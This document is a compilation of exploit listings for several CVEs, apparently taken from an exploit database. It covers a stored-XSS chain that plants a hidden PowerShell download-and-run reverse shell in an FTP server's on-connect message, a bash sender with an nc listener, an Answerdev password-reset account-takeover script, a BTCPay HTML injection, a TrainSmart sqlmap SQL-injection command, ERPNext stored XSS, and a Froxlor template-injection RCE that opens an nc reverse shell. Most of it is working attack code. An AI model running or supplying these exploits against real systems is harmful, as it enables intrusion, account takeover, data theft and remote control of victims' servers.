'close'<br /> },<br /> credentials: 'include',<br /> body: '%7B%22MsgOnCreateDirectory%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgOnUploadStart%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22File+status+okay;+about+to+open+data+connection.%22%7D,%22MsgOnUploadEnd%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Closing+data+connection.%22%7D,%22MsgOnDownloadEnd%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Closing+data+connection.%22%7D,%22MsgOnRemoveDirectory%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgBeforeCreateDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeRename%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeRemoveDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnQuit%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Goodbye.%22%7D,%22MsgOnCopy%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgOnDownloadStart%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22File+status+okay;+about+to+open+data+connection.%22%7D,%22MsgBeforeUpload%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnListDirectoryEnd%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Closing+data+connection.%22%7D,%22MsgBeforeLoggedIn%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Login+not+accepted%22%7D,%22MsgOnRename%22:%7B%22Show
Script%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgBeforeConnect%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Not+connected,+access+denied.+Please+don\'t+hammer.%22%7D,%22MsgBeforeDownload%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnChangeDirectory%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22CWD+Command+successful.%22%7D,%22MsgOnConnect%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22%25EXECUTE(PowerShell++-noprofile+-executionpolicy+bypass+%5C%22Start-process+powershell.exe+-argumentlist+\'-window+hidden+-noexit+Start-Job+-ScriptBlock+%7B+IEX(IWR+https://example.com/rev.ps1+-UseBasicParsing)+%7D\'%5C%22;exit)%25%22%7D,%22MsgOnListDirectoryStart%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Opening+connection+for+/bin/ls.%22%7D,%22MsgBeforeRemoveFile%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeChangeDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnDisconnect%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22%22%7D,%22MsgOnRemoveFile%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Requested+file+action+okay,+completed.%22%7D,%22MsgBeforeCopy%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgBeforeListDirectory%22:%7B%22ShowScript%22:true,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22Access+denied%22%7D,%22MsgOnLoggedIn%22:%7B%22ShowScript%22:false,%22Enabled%22:false,%22Script%22:%22%22,%22Text%22:%22User+logged+in,+proceed.%22%7D%7D'<br />});<br /><br />window.location.href = vhost;<br 
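/>fetch(vhost.replace(':8443',''))





Bash script for running exploit


#!/bin/bash
# CVE-2023-23286 - Provide Server 14.4: plant the XSS stager in the server
# log through the login form's username field, then wait for the shell.
#
#   ./exploit.sh <host[:port]>            send the stager
#   ./exploit.sh <host[:port]> trigger    make one connection, which runs the
#                                         %EXECUTE% on-connect message once an
#                                         administrator has opened the log
#
# ATTACKER_URL must serve xss.js (the "XSS payload" above) and rev.ps1, and
# LISTEN_PORT must match the port rev.ps1 connects back to.
#
# Reviewer notes: the original script had the stager URL baked into a fixed
# base64 string pointing at the author's own host, sent `-H $host` (a header
# literally named after the host) instead of a Host header, passed `$'POST'`
# without -X (curl then tries to fetch "POST" as a URL), and hard-coded
# "Content-Length: 262" even though curl computes the length itself.
set -u
host="$1"
attacker="${ATTACKER_URL:-https://example.com}"
listen_port="${LISTEN_PORT:-5555}"

echo "Sending payload"

if [ "${2:-}" == "trigger" ]; then
    # Any client connection runs the on-connect message, so a plain GET is enough.
    curl -s -k "https://$host" >/dev/null
else
    # Same stager as in the "Staged XSS" section, generated for $attacker:
    #   var a=document.createElement("script");a.src="<attacker>/xss.js";document.body.appendChild(a);
    stager="var a=document.createElement(\"script\");a.src=\"$attacker/xss.js\";document.body.appendChild(a);"
    stager_b64=$(printf '%s' "$stager" | base64 | tr -d '\n')
    # The stager lives in the img's id attribute; onload decodes and evals it.
    username="<img id=$stager_b64 src=$attacker/1 onload=eval(atob(this.id))>"

    # --data-urlencode does the form encoding the original did by hand.
    curl -i -s -k -X POST -H "Host: $host" \
        -H 'Content-Type: application/x-www-form-urlencoded' \
        -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
        -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-User: ?1' -H 'Sec-Fetch-Dest: document' \
        -H "Referer: https://$host" \
        -H 'Accept-Encoding: gzip, deflate' \
        -H 'Accept-Language: en-US,en;q=0.9,nb;q=0.8,no;q=0.7,en-GB;q=0.6' \
        -H 'Connection: close' \
        --data-urlencode 'path=/' \
        --data-urlencode "username=$username" \
        --data-urlencode 'password=' \
        --data-urlencode 'logon=Log in' \
        "https://$host" >/dev/null
    clear
fi
echo "Waiting..."
rlwrap nc -lvnp "$listen_port"

</code></pre>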
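# Exploit Title: Answerdev 1.0.3 - Account Takeover 
# Date: Reported on Jan 24th 2023
# Exploit Author: Eduardo Pérez-Malumbres Cervera @blueudp
# Vendor Homepage: https://answer.dev/
# Software Link: https://github.com/answerdev/answer
# Version: 1.0.3
# Tested on: Ubuntu 22.04 / Debian 11
# CVE : CVE-2023-0744
#
# The password-reset API returns the reset code in its JSON response
# ("data") instead of only e-mailing it, so anyone who knows a victim's
# address can build the reset link without access to the mailbox.

import sys
from sys import argv
import urllib3
from requests import post, RequestException

# Self-signed lab instances are common; verification is disabled on purpose.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def ato(url, email: str) -> str:
    """Request a password reset for *email* and return the resulting reset link.

    Args:
        url: base URL of the instance ending in "/".  The original passed a
            one-element list; a plain string is accepted too (both are joined).
        email: the victim's e-mail address (sent as ``e_mail``).

    Returns:
        "Your Link: ..." on success; "Cant reach URL: ..." when the request
        fails or the body is not JSON; a message saying no code was returned
        when "data" is missing or not a string (the target is then presumably
        patched).
    """
    base = ''.join(url)
    try:
        body = post(f"{base}answer/api/v1/user/password/reset",
                    json={"e_mail": email}, verify=False, timeout=15).json()
    except (RequestException, ValueError) as err:
        return f"Cant reach URL: {err}"

    code = body.get("data") if isinstance(body, dict) else None
    if not isinstance(code, str) or not code:
        return f"No reset code in the response (target may be patched): {body}"
    return f"Your Link: {base}users/password-reset?code={code}"


if __name__ == "__main__":
    if len(argv) != 3:
        print(f"Usage: {argv[0]} https://answer.domain/ myemail@localhost.com")
        sys.exit(1)

    target = argv[1] if argv[1].endswith("/") else argv[1] + "/"
    print(ato(target, str(argv[2])))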
<pre><code># Exploit Title: BTCPay Server v1.7.4 - HTML Injection<br /># Date: 01/26/2023<br /># Exploit Author: Manojkumar J (TheWhiteEvil)<br /># Vendor Homepage: https://github.com/btcpayserver/btcpayserver<br /># Software Link:<br />https://github.com/btcpayserver/btcpayserver/releases/tag/v1.7.5<br /># Version: <=1.7.4<br /># Tested on: Windows10<br /># CVE : CVE-2023-0493<br /><br /># Description:<br /><br />BTCPay Server up to v1.7.4 stores the label of an API key without sanitising it and renders it unescaped on the remove/delete step, so an authenticated user can inject HTML (the software link above points at the v1.7.5 release, presumably the fixed version).<br /><br /># Steps to exploit:<br /><br />1. Create an account on the target website.<br /><br />Register endpoint: https://target-website.com/register#<br /><br />2. Go to the API Keys page and create an API key with the HTML injection in the<br />label field.<br /><br />Example:<br /><br />&lt;a href="https://hackerbro.in"&gt;clickhere&lt;/a&gt;<br /><br /><br />3. Click remove/delete on that API key: the stored HTML is rendered, so the injected link appears instead of the literal text.<br /><br /></code></pre>
<pre><code># Exploit Title: itech TrainSmart r1044 - SQL injection<br /># Date: 03.02.2023<br /># Exploit Author: Adrian Bondocea<br /># Software Link: https://sourceforge.net/p/trainsmart/code/HEAD/tree/code/<br /># Version: TrainSmart r1044<br /># Tested on: Linux<br /># CVE : CVE-2021-36520<br /><br />SQL injection in itech TrainSmart r1044: the id parameter of the<br />/evaluation/assign-evaluation endpoint is used in a database query without<br />proper sanitisation, allowing remote attackers to read sensitive information<br />from the database (enumerated here with sqlmap). Whether the endpoint is<br />reachable without authentication is not stated in the original report.<br /><br />PoC (the double slash after the host is as in the original report; a single slash presumably works as well):<br />sqlmap --url 'http://{URL}//evaluation/assign-evaluation?id=1' -p id -dbs<br /><br /></code></pre>
<pre><code># Exploit Title: ERPNext 12.29 - Cross-Site Scripting (XSS)<br /># Date: 7 Feb 2023 <br /># Exploit Author: Patrick Dean Ramos / Nathu Nandwani / Junnair Manla<br /># Github - https://github.com/patrickdeanramos/CVE-2022-28598<br /># Vendor Homepage: https://erpnext.com/<br /># Version: 12.29<br /># CVE-2022-28598<br /><br />Summary: A stored cross-site scripting (XSS) vulnerability exists in ERPNext 12.29.0: the<br />"last_known_version" field of the user's "My Settings" page is stored without<br />sanitisation and later rendered unescaped in the PDF view of the User form.<br />An authenticated user can set the field to arbitrary script or HTML through<br />the User form at '/desk#Form/User/(Authenticated User)' (the save is an<br />authenticated POST request); the payload then runs when the 'PDF' view of that<br />form is opened. The original report does not state whether other users, e.g.<br />administrators, can reach the victim's form, which determines the real impact.<br /><br />The injection point is specifically the "last_known_version" field under<br />'My Settings'; the settings must be saved for the value to be stored.<br /><br />1. Log in as any user.<br />2. Put the malicious script in the 'last_known_version' field and save.<br />3. Open the PDF view of the form: the injected script executes (the original<br />advisory included a screenshot of this step, not reproduced here).<br /><br /><br /></code></pre>
<pre><code>#!/usr/bin/python3<br /><br /># Exploit Title: Froxlor 2.0.3 Stable - Remote Code Execution (RCE)<br /># Date: 2023-01-08<br /># Exploit Author: Askar (@mohammadaskar2)<br /># CVE: CVE-2023-0315<br /># Vendor Homepage: https://froxlor.org/<br /># Version: v2.0.3<br /># Tested on: Ubuntu 20.04 / PHP 8.2<br /><br /># NOTE(review): this listing is quoted-printable encoded as captured: "=3D" stands for "=",<br /># "=20" for a trailing space, and a line ending in "=" is a soft line break. Decode it before reading.<br />#<br /># Issue as exercised below (CVE-2023-0315): an authenticated admin (1) points the logger's file path<br /># at a Twig template under the web root, then (2) submits a Twig expression as the theme name; the<br /># value is presumably written into that template by the logger and evaluated on the next render<br /># (TODO confirm against the Froxlor logging code). Server-side mitigations: confine logger_logfile<br /># to the log directory, validate the theme against the installed theme list, and keep user-controlled<br /># strings out of template sources. Detection: a settings change moving the log file under the web<br /># root, a modified footer.html.twig, and an outbound connection from the PHP worker.<br />import telnetlib<br />import requests<br />import socket<br />import sys<br />import warnings<br />import random<br />import string<br />from bs4 import BeautifulSoup<br />from urllib.parse import quote<br />from threading import Thread<br /># random, string and quote are imported but never used below; telnetlib is deprecated since<br /># Python 3.11 and removed in 3.13.<br /><br />warnings.filterwarnings("ignore", category=3DUserWarning, module=3D'bs4')<br /><br /><br />if len(sys.argv) !=3D 6:<br /> print("[~] Usage : ./froxlor-rce.py url username password ip port")<br /> exit()<br /><br />url =3D sys.argv[1]<br />username =3D sys.argv[2]<br />password =3D sys.argv[3]<br />ip =3D sys.argv[4]<br />port =3D sys.argv[5]<br /><br /># One session object so the login cookie carries over to every later request.<br />request =3D requests.session()<br /><br /># Log in with the supplied credentials; success is judged solely by the Location header<br /># pointing to admin_index.php. A response without a Location header raises KeyError here<br /># (no handling).<br />def login():<br /> login_info =3D {<br /> "loginname": username,<br /> "password": password,<br /> "send": "send",<br /> "dologin": ""<br /> }<br /> login_request =3D request.post(url+"/index.php", login_info, allow_redi=<br />rects=3DFalse)<br /> login_headers =3D login_request.headers<br /> location_header =3D login_headers["Location"]<br /> if location_header =3D=3D "admin_index.php":<br /> return True<br /> else:<br /> return False<br /><br /><br /># Step 1: through the admin logging settings, set logger_logfile to a Twig template path under<br /># the web root. The CSRF token is scraped from the settings page's meta tag. Note that<br /># "logger_enabled" appears twice in the dict literal; Python keeps the last value ("1").<br />def change_log_path():<br /> change_log_path_url =3D url + "/admin_settings.php?page=3Doverview&part=<br />=3Dlogging"<br /> csrf_token_req =3D request.get(change_log_path_url)<br /> csrf_token_req_response =3D csrf_token_req.text<br /> soup =3D BeautifulSoup(csrf_token_req_response, "lxml")<br /> csrf_token =3D (soup.find("meta", {"name":"csrf-token"})["content"])<br /> print("[+] Main CSRF token retrieved %s" % csrf_token)<br /><br /> multipart_data =3D {<br /><br /> "logger_enabled": (None, "0"),<br /> "logger_enabled": (None, "1"),<br /> "logger_severity": 
(None, "2"),<br /> "logger_logtypes[]": (None, "file"),<br /> "logger_logfile": (None, "/var/www/html/froxlor/templates/Froxlor/f=<br />ooter.html.twig"),<br /> "logger_log_cron": (None, "0"),<br /> "csrf_token": (None, csrf_token),<br /> "page": (None, "overview"),<br /> "action": (None, ""),<br /> "send": (None, "send")<br /> =20<br /> }<br /> req =3D request.post(change_log_path_url, files=3Dmultipart_data)<br /> response =3D req.text<br /> if "The settings have been successfully saved." in response:<br /> print("[+] Changed log file path!")<br /> return True<br /> else:<br /> return False<br /><br /><br /># Step 2: submit a Twig filter expression as the theme value, then request admin_index.php once<br /># more so the template that now doubles as the log file is rendered. The bare except also hides<br /># any failure other than a missing Location header. The listener thread is started just before<br /># the trigger request.<br />def inject_template():<br /> admin_page_path =3D url + "/admin_index.php"<br /> csrf_token_req =3D request.get(admin_page_path)<br /> csrf_token_req_response =3D csrf_token_req.text<br /> soup =3D BeautifulSoup(csrf_token_req_response, "lxml")<br /> csrf_token =3D (soup.find("meta", {"name":"csrf-token"})["content"])<br /> onliner =3D "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {0} =<br />{1} >/tmp/f".format(ip, port)<br /> payload =3D "{{['%s']|filter('exec')}}" % onliner<br /> data =3D {<br /> "theme": payload,<br /> "csrf_token": csrf_token,<br /> "page": "change_theme",<br /> "send": "send",<br /> "dosave": "",<br /> }<br /> req =3D request.post(admin_page_path, data, allow_redirects=3DFalse)<br /> try:<br /> location_header =3D req.headers["Location"]<br /> if location_header =3D=3D "admin_index.php":<br /> print("[+] Injected the payload sucessfully!")<br /> except:<br /> print("[-] Can't Inject payload :/")<br /> exit()<br /> handler_thread =3D Thread(target=3Dconnection_handler, args=3D(port,))<br /> handler_thread.start()<br /> print("[+] Triggering the payload ...")<br /> req2 =3D request.get(admin_page_path)<br /><br /><br /># Bind 0.0.0.0:port, accept a single connection and hand it to telnetlib's interactive loop.<br /># The socket is never closed and the bind is unconditional (an occupied port raises OSError).<br />def connection_handler(port):<br /> print("[+] Listener started on port %s" % port)<br /> t =3D telnetlib.Telnet()<br /> s =3D socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> s.bind(("0.0.0.0", int(port)))<br 
/> s.listen(1)<br /> conn, addr =3D s.accept()<br /> print("[+] Connection received from %s" % addr[0])<br /> t.sock =3D conn<br /> print("[+] Heads up, incoming shell!!")<br /> t.interact()<br /><br /><br /><br /># Entry point: authenticate, warm the admin session, retarget the log file, then inject and trigger.<br />if login():<br /> print("[+] Successfully Logged in!")<br /> index_url =3D url + "/admin_index.php"<br /> request.get(index_url)<br /> if change_log_path():<br /> inject_template()<br /><br />else:<br /> print("[-] Can't login")<br /> <br /><br /></code></pre>